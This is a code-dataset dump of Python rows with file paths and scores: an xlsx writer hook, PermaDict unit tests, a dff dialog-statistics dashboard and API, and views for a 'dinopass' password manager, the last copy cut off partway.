    def _postprocess(self) -> None:
        super()._postprocess()

        # Enable filtering and freeze the header over the written region,
        # then drop the per-table caches.
        self.stream.autofilter(
            self.last_header_row, self.first_data_col, self.last_data_row, self.last_data_col
        )
        self.stream.freeze_panes(self.first_data_row, self.first_data_col)

        self.__col_cell_format_cache = {}
        self.__col_numprops_table = {}
self.__col_numprops_table = {} | 0.82755 | 0.286862 |
import unittest
from permadict import PermaDict
class PermaDictTests(unittest.TestCase):
    """Tests for PermaDict, a dict that refuses to overwrite existing keys."""

    def test_can_add_key(self):
        d = PermaDict()
        with self.assertRaises(KeyError):
            d[4]
        d[4] = "the number four"
        self.assertEqual(d[4], "the number four")

    def test_equal_to_dict(self):
        d = PermaDict()
        self.assertNotEqual(d, {4: "the number four"})
        d[4] = "the number four"
        self.assertEqual(d, {4: "the number four"})
        self.assertNotEqual(d, {4: "the number five"})
        self.assertEqual(PermaDict({1: 2, 3: 4}), {1: 2, 3: 4})

    def test_can_iterate(self):
        d = PermaDict({'a': 'b', 'c': 'd'})
        self.assertEqual(set(d), {'a', 'c'})

    def test_has_keys_values_and_items(self):
        d = PermaDict({'a': 'b', 'c': 'd'})
        self.assertEqual(set(d.keys()), {'a', 'c'})
        self.assertEqual(set(d.values()), {'b', 'd'})
        self.assertEqual(set(d.items()), {('a', 'b'), ('c', 'd')})

    def test_can_pop_key(self):
        d = PermaDict()
        d[4] = "the number four"
        self.assertEqual(d, {4: "the number four"})
        self.assertEqual(d.pop(4), "the number four")
        self.assertEqual(d, {})

    def test_can_update_with_new_keys(self):
        # update() must accept a mapping, an iterable of pairs, and kwargs.
        d = PermaDict()
        d.update({'a': 1})
        self.assertEqual(d, {'a': 1})
        d.update([('b', 2)])
        self.assertEqual(d, {'a': 1, 'b': 2})
        d.update(c=3)
        self.assertEqual(d, {'a': 1, 'b': 2, 'c': 3})

    def test_error_when_changing_value(self):
        d = PermaDict()
        d[4] = "the number four"
        with self.assertRaises(KeyError):
            d[4] = "the number 4"
        self.assertEqual(d, {4: "the number four"})

    def test_error_when_updating_value(self):
        # update() applies items up to (but not including) the first
        # duplicate key, then raises — it is not expected to be atomic.
        d = PermaDict({1: 2, 3: 4})
        with self.assertRaises(KeyError):
            d.update([(5, 6), (1, 8), (7, 8)])
        self.assertEqual(d, {1: 2, 3: 4, 5: 6})

    # To test the Bonus part of this exercise, comment out the following line
    # @unittest.expectedFailure
    def test_force_set_method(self):
        d = PermaDict({1: 2, 3: 4})
        d.force_set(3, 6)
        d.force_set(5, 6)
        self.assertEqual(d, {1: 2, 3: 6, 5: 6})

    # To test the Bonus part of this exercise, comment out the following line
    # @unittest.expectedFailure
    def test_silent_flag_to_initializer(self):
        # silent=True makes duplicate-key writes silent no-ops; other keyword
        # arguments still become dictionary items.
        d = PermaDict({1: 2, 3: 4}, silent=True)
        d.update([(5, 6), (1, 8), (7, 8)])
        self.assertEqual(d, {1: 2, 3: 4, 5: 6, 7: 8})
        d[3] = 6
        d[9] = 10
        self.assertEqual(d, {1: 2, 3: 4, 5: 6, 7: 8, 9: 10})
        e = PermaDict(silent=True, not_silent=False, super_silent=True)
        self.assertEqual(e, {'not_silent': False, 'super_silent': True})

    # To test the Bonus part of this exercise, comment out the following line
    # @unittest.expectedFailure
    def test_force_argument_to_update(self):
        # force=True overrides the overwrite protection for this call only.
        d = PermaDict({1: 2, 3: 4}, silent=True)
        d.update([(5, 6), (1, 8), (7, 8)], force=True)
        self.assertEqual(d, {1: 8, 3: 4, 5: 6, 7: 8})
        e = PermaDict()
        e.update(a=1, b=2, force=True)
        self.assertEqual(e, {'a': 1, 'b': 2})
if __name__ == "__main__":
unittest.main(verbosity=2) | 20-29/23. permadict/test_permadict.py | import unittest
from permadict import PermaDict
class PermaDictTests(unittest.TestCase):
    """Tests for PermaDict, a dict that refuses to overwrite existing keys."""

    def test_can_add_key(self):
        d = PermaDict()
        with self.assertRaises(KeyError):
            d[4]
        d[4] = "the number four"
        self.assertEqual(d[4], "the number four")

    def test_equal_to_dict(self):
        d = PermaDict()
        self.assertNotEqual(d, {4: "the number four"})
        d[4] = "the number four"
        self.assertEqual(d, {4: "the number four"})
        self.assertNotEqual(d, {4: "the number five"})
        self.assertEqual(PermaDict({1: 2, 3: 4}), {1: 2, 3: 4})

    def test_can_iterate(self):
        d = PermaDict({'a': 'b', 'c': 'd'})
        self.assertEqual(set(d), {'a', 'c'})

    def test_has_keys_values_and_items(self):
        d = PermaDict({'a': 'b', 'c': 'd'})
        self.assertEqual(set(d.keys()), {'a', 'c'})
        self.assertEqual(set(d.values()), {'b', 'd'})
        self.assertEqual(set(d.items()), {('a', 'b'), ('c', 'd')})

    def test_can_pop_key(self):
        d = PermaDict()
        d[4] = "the number four"
        self.assertEqual(d, {4: "the number four"})
        self.assertEqual(d.pop(4), "the number four")
        self.assertEqual(d, {})

    def test_can_update_with_new_keys(self):
        # update() must accept a mapping, an iterable of pairs, and kwargs.
        d = PermaDict()
        d.update({'a': 1})
        self.assertEqual(d, {'a': 1})
        d.update([('b', 2)])
        self.assertEqual(d, {'a': 1, 'b': 2})
        d.update(c=3)
        self.assertEqual(d, {'a': 1, 'b': 2, 'c': 3})

    def test_error_when_changing_value(self):
        d = PermaDict()
        d[4] = "the number four"
        with self.assertRaises(KeyError):
            d[4] = "the number 4"
        self.assertEqual(d, {4: "the number four"})

    def test_error_when_updating_value(self):
        # update() applies items up to (but not including) the first
        # duplicate key, then raises — it is not expected to be atomic.
        d = PermaDict({1: 2, 3: 4})
        with self.assertRaises(KeyError):
            d.update([(5, 6), (1, 8), (7, 8)])
        self.assertEqual(d, {1: 2, 3: 4, 5: 6})

    # To test the Bonus part of this exercise, comment out the following line
    # @unittest.expectedFailure
    def test_force_set_method(self):
        d = PermaDict({1: 2, 3: 4})
        d.force_set(3, 6)
        d.force_set(5, 6)
        self.assertEqual(d, {1: 2, 3: 6, 5: 6})

    # To test the Bonus part of this exercise, comment out the following line
    # @unittest.expectedFailure
    def test_silent_flag_to_initializer(self):
        # silent=True makes duplicate-key writes silent no-ops; other keyword
        # arguments still become dictionary items.
        d = PermaDict({1: 2, 3: 4}, silent=True)
        d.update([(5, 6), (1, 8), (7, 8)])
        self.assertEqual(d, {1: 2, 3: 4, 5: 6, 7: 8})
        d[3] = 6
        d[9] = 10
        self.assertEqual(d, {1: 2, 3: 4, 5: 6, 7: 8, 9: 10})
        e = PermaDict(silent=True, not_silent=False, super_silent=True)
        self.assertEqual(e, {'not_silent': False, 'super_silent': True})

    # To test the Bonus part of this exercise, comment out the following line
    # @unittest.expectedFailure
    def test_force_argument_to_update(self):
        # force=True overrides the overwrite protection for this call only.
        d = PermaDict({1: 2, 3: 4}, silent=True)
        d.update([(5, 6), (1, 8), (7, 8)], force=True)
        self.assertEqual(d, {1: 8, 3: 4, 5: 6, 7: 8})
        e = PermaDict()
        e.update(a=1, b=2, force=True)
        self.assertEqual(e, {'a': 1, 'b': 2})
if __name__ == "__main__":
    # Run the suite directly with verbose per-test output.
    unittest.main(verbosity=2)
from typing import Optional
import pathlib
import datetime
import pandas as pd
from pydantic import validate_arguments, BaseModel
from dff.core import Context, Actor
from dff.core.types import ActorStage
class Stats(BaseModel):
    """Collects and persists per-turn dialog statistics for a dff Actor.

    Rows are buffered as single-row DataFrames in ``dfs`` and flushed to
    ``csv_file`` by :meth:`save`. Visualization/serving entry points:
    :meth:`streamlit_run` and :meth:`api_run`.
    """

    # Destination CSV file for the collected statistics.
    csv_file: pathlib.Path
    # Timestamp of the current turn's start; set by get_start_time.
    start_time: Optional[datetime.datetime] = None
    # Buffer of single-row DataFrames not yet flushed to disk.
    dfs: list = []
    # Column dtypes applied when reading the CSV back.
    column_dtypes: dict = {
        "context_id": "str",
        "flow_label": "str",
        "node_label": "str",
        "history_id": "int64",
        "duration_time": "float64",
    }

    @validate_arguments
    def _update_handlers(self, actor: Actor, stage: ActorStage, handler) -> Actor:
        # Append (never replace) a handler for the given actor lifecycle stage.
        actor.handlers[stage] = actor.handlers.get(stage, []) + [handler]
        return actor

    def update_actor_handlers(self, actor: Actor, auto_save: bool = True, *args, **kwargs):
        # Wire the statistics collectors into the actor's lifecycle: record
        # the turn start at context init and collect (optionally persist)
        # stats at the end of each turn.
        self._update_handlers(actor, ActorStage.CONTEXT_INIT, self.get_start_time)
        self._update_handlers(actor, ActorStage.FINISH_TURN, self.collect_stats)
        if auto_save:
            self._update_handlers(actor, ActorStage.FINISH_TURN, self.save)

    @validate_arguments
    def get_start_time(self, ctx: Context, actor: Actor, *args, **kwargs):
        # Mark the start of the current turn; on the first turn of a context
        # also record the actor's start label with sentinel history_id -1.
        self.start_time = datetime.datetime.now()
        if ctx.last_label is None:
            self.add_df(ctx.id, -1, *actor.start_label[:2])

    def add_df(self, context_id, history_id, flow_label, node_label):
        # Buffer one row; duration_time is measured from the turn start.
        self.dfs += [
            pd.DataFrame(
                {
                    "context_id": [str(context_id)],
                    "history_id": [history_id],
                    "start_time": [self.start_time],
                    "duration_time": [(datetime.datetime.now() - self.start_time).total_seconds()],
                    "flow_label": [flow_label],
                    "node_label": [node_label],
                },
            )
        ]

    @validate_arguments
    def collect_stats(self, ctx: Context, actor: Actor, *args, **kwargs):
        # history_id is the most recent label index, or -1 when none exist.
        indexes = list(ctx.labels)
        current_index = indexes[-1] if indexes else -1
        self.add_df(
            ctx.id,
            current_index,
            *ctx.last_label[:2],
        )

    def save(self, *args, **kwargs):
        # Merge the on-disk rows (if any) with the buffered ones, rewrite
        # the CSV, then drop the buffer.
        saved_df = (
            pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
            if self.csv_file.exists()
            else pd.DataFrame()
        )
        pd.concat([saved_df] + self.dfs).to_csv(self.csv_file, index=False)
        self.dfs.clear()

    @property
    def dataframe(self):
        # NOTE: re-reads csv_file from disk on every access; unsaved rows
        # in self.dfs are not included.
        return pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])

    @property
    def transition_counts(self):
        # NOTE(review): Series.shift() moves values DOWN, so "next_node"
        # actually holds the PREVIOUS row's node, and rows are not grouped
        # by context_id before shifting — confirm the intended transition
        # direction and per-context isolation before relying on these counts.
        df = self.dataframe.copy()
        df["node"] = df.apply(lambda row: f"{row.flow_label}:{row.node_label}", axis=1)
        df = df.drop(["flow_label", "node_label"], axis=1)
        df = df.sort_values(["context_id"], kind="stable")
        df["next_node"] = df.node.shift()
        df = df[df.history_id != 0]
        transitions = df.apply(lambda row: f"{row.node}->{row.next_node}", axis=1)
        return {k: int(v) for k, v in dict(transitions.value_counts()).items()}

    @property
    def transition_probs(self):
        # Normalize transition counts into probabilities.
        tc = self.transition_counts
        total = sum(tc.values(), 0)
        return {k: v / total for k, v in tc.items()}

    def preproc_df(self, df):
        # Derive per-context "node", "edge" and "edge_type" columns.
        # NOTE(review): iterates the context ids of self.dataframe (the CSV
        # on disk) while mutating the passed-in df — presumably both hold
        # the same contexts; verify against callers.
        for context_id in self.dataframe.context_id.unique():
            ctx_index = df.context_id == context_id
            df.loc[ctx_index, "node"] = df.loc[ctx_index, "flow_label"] + ":" + df.loc[ctx_index, "node_label"]
            df.loc[ctx_index, "edge"] = (
                df.loc[ctx_index, "node"].shift(periods=1).combine(df.loc[ctx_index, "node"], lambda *x: list(x))
            )
            flow_label = df.loc[ctx_index, "flow_label"]
            # Edge type is the flow label when both endpoints share a flow,
            # otherwise "MIXED".
            df.loc[ctx_index, "edge_type"] = flow_label.where(flow_label.shift(periods=1) == flow_label, "MIXED")
        return df

    def streamlit_run(self):
        """Render an interactive Streamlit dashboard over the collected CSV."""
        import streamlit as st
        import graphviz
        import datetime

        @st.cache(allow_output_mutation=True)
        def read_data():
            df = pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
            df = self.preproc_df(df)
            return df

        df_origin = read_data()

        @st.cache()
        def get_datatimes():
            # Pad the borders by one day so the date pickers include all rows.
            start_time = pd.to_datetime(df_origin.start_time.min()) - datetime.timedelta(days=1)
            end_time = pd.to_datetime(df_origin.start_time.max()) + datetime.timedelta(days=1)
            return start_time, end_time

        start_time_border, end_time_border = get_datatimes()

        def get_sidebar_chnges():
            # Sidebar controls: date range plus an optional context filter.
            start_date = pd.to_datetime(st.sidebar.date_input("Start date", start_time_border))
            end_date = pd.to_datetime(st.sidebar.date_input("End date", end_time_border))
            if start_date < end_date:
                st.sidebar.success("Start date: `%s`\n\nEnd date:`%s`" % (start_date, end_date))
            else:
                st.sidebar.error("Error: End date must fall after start date.")
            context_id = st.sidebar.selectbox(
                "Choose context_id",
                options=["all"] + df_origin.context_id.unique().tolist(),
            )
            return start_date, end_date, context_id

        start_date, end_date, context_id = get_sidebar_chnges()

        @st.cache()
        def slice_df_origin(start_date, end_date, context_id):
            # "all" disables the per-context filter.
            return df_origin[
                (df_origin.start_time >= start_date)
                & (df_origin.start_time <= end_date)
                & ((df_origin.context_id == context_id) | (context_id == "all"))
            ]

        df = slice_df_origin(start_date, end_date, context_id)
        node_counter = df.node.value_counts()
        edge_counter = df.edge.value_counts()
        # Map node names to short graphviz-safe identifiers.
        node2code = {key: f"n{index}" for index, key in enumerate(df.node.unique())}
        st.title("DialogFlow Framework Statistic Dashboard")
        col1, col2 = st.columns(2)
        col1.subheader("Data")
        col1.dataframe(df)
        col2.subheader("Timings")
        col2.dataframe(df.describe().duration_time)
        col2.write(f"Data shape {df.shape}")
        st.subheader("Graph of Transitions")
        graph = graphviz.Digraph()
        graph.attr(compound="true")
        flow_labels = df.flow_label.unique()
        # One filled subgraph cluster per flow label.
        for i, flow_label in enumerate(flow_labels):
            with graph.subgraph(name=f"cluster{i}") as sub_graph:
                sub_graph.attr(style="filled", color="lightgrey")
                sub_graph.attr(label=flow_label)
                sub_graph.node_attr.update(style="filled", color="white")
                for _, (history_id, node, node_label) in df.loc[
                    df.flow_label == flow_label, ("history_id", "node", "node_label")
                ].iterrows():
                    counter = node_counter[node]
                    label = f"{node_label} ({counter=})"
                    if history_id == -1:
                        # Start node gets a distinctive shape.
                        sub_graph.node(node2code[node], label=label, shape="Mdiamond")
                    else:
                        sub_graph.node(node2code[node], label=label)
        for (in_node, out_node), counter in edge_counter.items():
            if isinstance(in_node, str):
                label = f"(probs={counter/node_counter[in_node]:.2f})"
                graph.edge(node2code[in_node], node2code[out_node], label=label)
        st.graphviz_chart(graph)
        st.subheader("Transition Trace")
        df_trace = df[["history_id", "flow_label", "node"]]
        df_trace.index = df_trace.history_id
        df_trace = df_trace.drop(columns=["history_id"])
        df_trace
        node_trace = {}
        for flow_label in df_trace.flow_label.unique():
            node_trace[flow_label] = df_trace.loc[df_trace.flow_label == flow_label, "node"]
        st.bar_chart(df_trace.loc[:, "node"])
        st.subheader("Node counters")
        node_counters = {}
        for flow_label in flow_labels:
            node_counters[flow_label] = df.loc[df.flow_label == flow_label, "node_label"].value_counts()
        st.bar_chart(node_counters)
        st.subheader("Transitions counters")
        edge_counters = {}
        for edge_type in df.edge_type.unique():
            edge_counters[edge_type] = df.loc[df.edge_type == edge_type, "edge"].astype("str").value_counts()
        st.bar_chart(edge_counters)
        st.subheader("Transitions duration [sec]")
        edge_time = df[["edge", "edge_type", "duration_time"]]
        edge_time = edge_time.astype({"edge": "str"})
        edge_time = edge_time.groupby(["edge", "edge_type"], as_index=False).mean()
        edge_time.index = edge_time.edge
        edge_duration = {}
        for edge_type in df.edge_type.unique():
            edge_duration[edge_type] = edge_time.loc[edge_time.edge_type == edge_type, "duration_time"]
        st.bar_chart(edge_duration)

    def api_run(self, port=8000):
        """Serve the transition statistics over a small FastAPI app."""
        import uvicorn
        from fastapi import FastAPI

        app = FastAPI()

        @app.get("/api/v1/stats/transition-counts", response_model=dict[str, int])
        async def get_transition_counts():
            return self.transition_counts

        @app.get("/api/v1/stats/transition-probs", response_model=dict[str, float])
        async def get_transition_probs():
            return self.transition_probs

        uvicorn.run(app, host="0.0.0.0", port=port)
# st.title("Node Analytics")
# st.dataframe(self.dataframe[["flow_label", "node_label"]])
# # st.subheader('Node labels')
# st.bar_chart(self.dataframe["node_label"].value_counts())
# st.bar_chart(self.dataframe["node_label"])
# # st.dataframe(self.dataframe) | dff_node_stats/stats.py | from typing import Optional
import pathlib
import datetime
import pandas as pd
from pydantic import validate_arguments, BaseModel
from dff.core import Context, Actor
from dff.core.types import ActorStage
class Stats(BaseModel):
    """Collects per-turn dialog statistics from a dff Actor, persists them
    to a CSV file, and offers aggregate views plus Streamlit/FastAPI UIs.
    """

    # Destination CSV accumulating one row per visited node.
    csv_file: pathlib.Path
    # Timestamp of the current turn's start; set in get_start_time.
    start_time: Optional[datetime.datetime] = None
    # Buffer of one-row DataFrames collected since the last save().
    # NOTE: pydantic copies mutable field defaults per instance, so the
    # mutable [] default is not shared between Stats objects.
    dfs: list = []
    # dtypes used when (re)loading the CSV so columns round-trip stably.
    column_dtypes: dict = {
        "context_id": "str",
        "flow_label": "str",
        "node_label": "str",
        "history_id": "int64",
        "duration_time": "float64",
    }

    @validate_arguments
    def _update_handlers(self, actor: Actor, stage: ActorStage, handler) -> Actor:
        """Append *handler* to the actor's handler list for *stage*."""
        actor.handlers[stage] = actor.handlers.get(stage, []) + [handler]
        return actor

    def update_actor_handlers(self, actor: Actor, auto_save: bool = True, *args, **kwargs):
        """Hook this Stats object into an Actor's lifecycle stages."""
        self._update_handlers(actor, ActorStage.CONTEXT_INIT, self.get_start_time)
        self._update_handlers(actor, ActorStage.FINISH_TURN, self.collect_stats)
        if auto_save:
            # Flush the buffered rows to CSV at the end of every turn.
            self._update_handlers(actor, ActorStage.FINISH_TURN, self.save)

    @validate_arguments
    def get_start_time(self, ctx: Context, actor: Actor, *args, **kwargs):
        """Record the turn's start time; log the start node on a fresh context."""
        self.start_time = datetime.datetime.now()
        if ctx.last_label is None:
            # history_id == -1 marks the synthetic "start" row.
            self.add_df(ctx.id, -1, *actor.start_label[:2])

    def add_df(self, context_id, history_id, flow_label, node_label):
        """Buffer one statistics row as a one-row DataFrame."""
        self.dfs += [
            pd.DataFrame(
                {
                    "context_id": [str(context_id)],
                    "history_id": [history_id],
                    "start_time": [self.start_time],
                    "duration_time": [(datetime.datetime.now() - self.start_time).total_seconds()],
                    "flow_label": [flow_label],
                    "node_label": [node_label],
                },
            )
        ]

    @validate_arguments
    def collect_stats(self, ctx: Context, actor: Actor, *args, **kwargs):
        """Buffer a row for the node reached in the turn that just finished."""
        indexes = list(ctx.labels)
        current_index = indexes[-1] if indexes else -1
        self.add_df(
            ctx.id,
            current_index,
            *ctx.last_label[:2],
        )

    def save(self, *args, **kwargs):
        """Append the buffered rows to csv_file and clear the buffer."""
        saved_df = (
            pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
            if self.csv_file.exists()
            else pd.DataFrame()
        )
        pd.concat([saved_df] + self.dfs).to_csv(self.csv_file, index=False)
        self.dfs.clear()

    @property
    def dataframe(self):
        """All statistics currently stored in csv_file, freshly loaded."""
        return pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])

    @property
    def transition_counts(self):
        """Count node-to-node transition strings over the whole CSV."""
        df = self.dataframe.copy()
        df["node"] = df.apply(lambda row: f"{row.flow_label}:{row.node_label}", axis=1)
        df = df.drop(["flow_label", "node_label"], axis=1)
        # Stable sort keeps per-context row order while grouping contexts.
        df = df.sort_values(["context_id"], kind="stable")
        # NOTE(review): shift() moves values *down*, so "next_node" actually
        # holds the PREVIOUS row's node; the arrow built below may therefore
        # point backwards (node->previous). Confirm the intended direction.
        df["next_node"] = df.node.shift()
        df = df[df.history_id != 0]
        transitions = df.apply(lambda row: f"{row.node}->{row.next_node}", axis=1)
        return {k: int(v) for k, v in dict(transitions.value_counts()).items()}

    @property
    def transition_probs(self):
        """Relative frequency of each transition (count / total)."""
        tc = self.transition_counts
        total = sum(tc.values(), 0)
        return {k: v / total for k, v in tc.items()}

    def preproc_df(self, df):
        """Derive node / edge / edge_type columns per conversation context.

        NOTE(review): the loop keys come from self.dataframe (a fresh CSV
        read), not from *df* itself — presumably the same set of ids;
        verify against callers.
        """
        for context_id in self.dataframe.context_id.unique():
            ctx_index = df.context_id == context_id
            df.loc[ctx_index, "node"] = df.loc[ctx_index, "flow_label"] + ":" + df.loc[ctx_index, "node_label"]
            # edge = [previous_node, current_node] within one context.
            df.loc[ctx_index, "edge"] = (
                df.loc[ctx_index, "node"].shift(periods=1).combine(df.loc[ctx_index, "node"], lambda *x: list(x))
            )
            flow_label = df.loc[ctx_index, "flow_label"]
            # Transitions that cross flow boundaries are tagged "MIXED".
            df.loc[ctx_index, "edge_type"] = flow_label.where(flow_label.shift(periods=1) == flow_label, "MIXED")
        return df

    def streamlit_run(self):
        """Render an interactive statistics dashboard with Streamlit."""
        import streamlit as st
        import graphviz
        import datetime

        @st.cache(allow_output_mutation=True)
        def read_data():
            # Load + preprocess once; Streamlit caches across reruns.
            df = pd.read_csv(self.csv_file, dtype=self.column_dtypes, parse_dates=["start_time"])
            df = self.preproc_df(df)
            return df

        df_origin = read_data()

        @st.cache()
        def get_datatimes():
            # Widen the selectable range by one day on each side.
            start_time = pd.to_datetime(df_origin.start_time.min()) - datetime.timedelta(days=1)
            end_time = pd.to_datetime(df_origin.start_time.max()) + datetime.timedelta(days=1)
            return start_time, end_time

        start_time_border, end_time_border = get_datatimes()

        def get_sidebar_chnges():
            # Sidebar filters: date window and (optionally) one context id.
            start_date = pd.to_datetime(st.sidebar.date_input("Start date", start_time_border))
            end_date = pd.to_datetime(st.sidebar.date_input("End date", end_time_border))
            if start_date < end_date:
                st.sidebar.success("Start date: `%s`\n\nEnd date:`%s`" % (start_date, end_date))
            else:
                st.sidebar.error("Error: End date must fall after start date.")
            context_id = st.sidebar.selectbox(
                "Choose context_id",
                options=["all"] + df_origin.context_id.unique().tolist(),
            )
            return start_date, end_date, context_id

        start_date, end_date, context_id = get_sidebar_chnges()

        @st.cache()
        def slice_df_origin(start_date, end_date, context_id):
            # "all" disables the context filter via the OR clause.
            return df_origin[
                (df_origin.start_time >= start_date)
                & (df_origin.start_time <= end_date)
                & ((df_origin.context_id == context_id) | (context_id == "all"))
            ]

        df = slice_df_origin(start_date, end_date, context_id)
        node_counter = df.node.value_counts()
        edge_counter = df.edge.value_counts()
        # Stable short graphviz ids for each node label.
        node2code = {key: f"n{index}" for index, key in enumerate(df.node.unique())}
        st.title("DialogFlow Framework Statistic Dashboard")
        col1, col2 = st.columns(2)
        col1.subheader("Data")
        col1.dataframe(df)
        col2.subheader("Timings")
        col2.dataframe(df.describe().duration_time)
        col2.write(f"Data shape {df.shape}")
        st.subheader("Graph of Transitions")
        graph = graphviz.Digraph()
        graph.attr(compound="true")
        flow_labels = df.flow_label.unique()
        # One cluster per flow; start rows (history_id == -1) get the
        # distinctive Mdiamond shape.
        for i, flow_label in enumerate(flow_labels):
            with graph.subgraph(name=f"cluster{i}") as sub_graph:
                sub_graph.attr(style="filled", color="lightgrey")
                sub_graph.attr(label=flow_label)
                sub_graph.node_attr.update(style="filled", color="white")
                for _, (history_id, node, node_label) in df.loc[
                    df.flow_label == flow_label, ("history_id", "node", "node_label")
                ].iterrows():
                    counter = node_counter[node]
                    label = f"{node_label} ({counter=})"
                    if history_id == -1:
                        sub_graph.node(node2code[node], label=label, shape="Mdiamond")
                    else:
                        sub_graph.node(node2code[node], label=label)
        for (in_node, out_node), counter in edge_counter.items():
            # Skip edges whose source is missing (NaN produced by shift()).
            if isinstance(in_node, str):
                label = f"(probs={counter/node_counter[in_node]:.2f})"
                graph.edge(node2code[in_node], node2code[out_node], label=label)
        st.graphviz_chart(graph)
        st.subheader("Transition Trace")
        df_trace = df[["history_id", "flow_label", "node"]]
        df_trace.index = df_trace.history_id
        df_trace = df_trace.drop(columns=["history_id"])
        # Bare expression: Streamlit "magic" renders the dataframe.
        df_trace
        node_trace = {}
        for flow_label in df_trace.flow_label.unique():
            node_trace[flow_label] = df_trace.loc[df_trace.flow_label == flow_label, "node"]
        st.bar_chart(df_trace.loc[:, "node"])
        st.subheader("Node counters")
        node_counters = {}
        for flow_label in flow_labels:
            node_counters[flow_label] = df.loc[df.flow_label == flow_label, "node_label"].value_counts()
        st.bar_chart(node_counters)
        st.subheader("Transitions counters")
        edge_counters = {}
        for edge_type in df.edge_type.unique():
            edge_counters[edge_type] = df.loc[df.edge_type == edge_type, "edge"].astype("str").value_counts()
        st.bar_chart(edge_counters)
        st.subheader("Transitions duration [sec]")
        edge_time = df[["edge", "edge_type", "duration_time"]]
        edge_time = edge_time.astype({"edge": "str"})
        edge_time = edge_time.groupby(["edge", "edge_type"], as_index=False).mean()
        edge_time.index = edge_time.edge
        edge_duration = {}
        for edge_type in df.edge_type.unique():
            edge_duration[edge_type] = edge_time.loc[edge_time.edge_type == edge_type, "duration_time"]
        st.bar_chart(edge_duration)

    def api_run(self, port=8000):
        """Expose transition counts/probabilities over HTTP (blocking).

        NOTE(review): dict[str, int] as response_model needs Python >= 3.9.
        """
        import uvicorn
        from fastapi import FastAPI
        app = FastAPI()

        @app.get("/api/v1/stats/transition-counts", response_model=dict[str, int])
        async def get_transition_counts():
            return self.transition_counts

        @app.get("/api/v1/stats/transition-probs", response_model=dict[str, float])
        async def get_transition_probs():
            return self.transition_probs

        # 0.0.0.0: listen on all interfaces.
        uvicorn.run(app, host="0.0.0.0", port=port)
# st.title("Node Analytics")
# st.dataframe(self.dataframe[["flow_label", "node_label"]])
# # st.subheader('Node labels')
# st.bar_chart(self.dataframe["node_label"].value_counts())
# st.bar_chart(self.dataframe["node_label"])
# # st.dataframe(self.dataframe) | 0.850841 | 0.185228 |
from dinopass.encryption import encrypt, decrypt
from dinopass.models import MasterPassword, Password
class PasswordViewMixin:
    """Shared CRUD helpers for the concrete password views.

    Subclasses must set ``model`` to the model class they operate on;
    instantiating the mixin without one raises NotImplementedError.
    """

    model = None  # concrete views override this with a model class

    def __init__(self, db_session):
        # Refuse to work without a concrete model bound to the class.
        if not self.model:
            raise NotImplementedError('Please specify a model!')
        self._db_session = db_session

    def get(self):
        """Return the record exposed by the model."""
        return self.model.get(self._db_session)

    def purge(self):
        """Delete every record of the model and commit immediately."""
        session = self._db_session
        self.model.purge(session)
        session.commit()

    def has_records(self):
        """Return whether at least one record of the model exists."""
        return self.model.has_records(self._db_session)
class MasterPasswordView(PasswordViewMixin):
    """View over the stored master-password record."""

    model = MasterPassword

    @property
    def salt(self):
        """Salt stored alongside the master password."""
        return self.model.get(self._db_session).salt

    @property
    def hash_key(self):
        """Derived hash of the master password."""
        return self.model.get(self._db_session).hash_key

    def create(self, **kwargs):
        """Insert a new master-password record and commit."""
        session = self._db_session
        session.add(self.model.create(**kwargs))
        session.commit()

    def is_valid(self, hash_key):
        """Check a candidate hash against the stored one."""
        return hash_key == self.hash_key
class PasswordView(PasswordViewMixin):
    """View over named password records; values are stored encrypted."""

    model = Password

    @property
    def name(self):
        return self.model.get(self._db_session).name

    @property
    def value(self):
        return self.model.get(self._db_session).value

    def create(self, key, name, value):
        """Encrypt *value* with *key*, store it under *name*, commit."""
        record = self.model.create(name=name, value=encrypt(key, value))
        session = self._db_session
        session.add(record)
        session.commit()

    def get_all(self, key):
        """Return every record as a dict, with values decrypted via *key*."""
        results = []
        for record in self.model.get_all(self._db_session):
            record.value = decrypt(key, record.value)
            results.append(record.to_dict())
        return results

    def get_by_name(self, key, name):
        """Return a one-element list with the decrypted record, or []."""
        record = self.model.get_by_name(name, self._db_session)
        if not record:
            return []
        record.value = decrypt(key, record.value)
        return [record.to_dict()]

    def update(self, key, field, value, field_to_update, new_value):
        """Update one field on records matching ``field == value``; commit."""
        if field_to_update == 'value':
            # Stored password values are always kept encrypted.
            new_value = encrypt(key, new_value)
        self.model.update_by_field(
            field=field,
            value=value,
            field_to_update=field_to_update,
            new_value=new_value,
            session=self._db_session
        )
        self._db_session.commit()
        # NOTE(review): this prints the *field* name, not the record name —
        # confirm the intended message.
        print(f'Updated record with name = {field_to_update}')

    def delete(self, name):
        """Delete the record called *name* and commit."""
        self.model.delete_by_name(name=name, session=self._db_session)
        self._db_session.commit()
print(f'Deleted record with name = {name}') | dinopass/views.py | from dinopass.encryption import encrypt, decrypt
from dinopass.models import MasterPassword, Password
class PasswordViewMixin:
    """Shared CRUD helpers for the concrete password views.

    Subclasses must set ``model`` to the model class they operate on;
    instantiating the mixin without one raises NotImplementedError.
    """

    model = None  # concrete views override this with a model class

    def __init__(self, db_session):
        # Refuse to work without a concrete model bound to the class.
        if not self.model:
            raise NotImplementedError('Please specify a model!')
        self._db_session = db_session

    def get(self):
        """Return the record exposed by the model."""
        return self.model.get(self._db_session)

    def purge(self):
        """Delete every record of the model and commit immediately."""
        session = self._db_session
        self.model.purge(session)
        session.commit()

    def has_records(self):
        """Return whether at least one record of the model exists."""
        return self.model.has_records(self._db_session)
class MasterPasswordView(PasswordViewMixin):
    """View over the stored master-password record."""

    model = MasterPassword

    @property
    def salt(self):
        """Salt stored alongside the master password."""
        return self.model.get(self._db_session).salt

    @property
    def hash_key(self):
        """Derived hash of the master password."""
        return self.model.get(self._db_session).hash_key

    def create(self, **kwargs):
        """Insert a new master-password record and commit."""
        session = self._db_session
        session.add(self.model.create(**kwargs))
        session.commit()

    def is_valid(self, hash_key):
        """Check a candidate hash against the stored one."""
        return hash_key == self.hash_key
class PasswordView(PasswordViewMixin):
    """View over named password records; values are stored encrypted."""

    model = Password

    @property
    def name(self):
        return self.model.get(self._db_session).name

    @property
    def value(self):
        return self.model.get(self._db_session).value

    def create(self, key, name, value):
        """Encrypt *value* with *key*, store it under *name*, commit."""
        record = self.model.create(name=name, value=encrypt(key, value))
        session = self._db_session
        session.add(record)
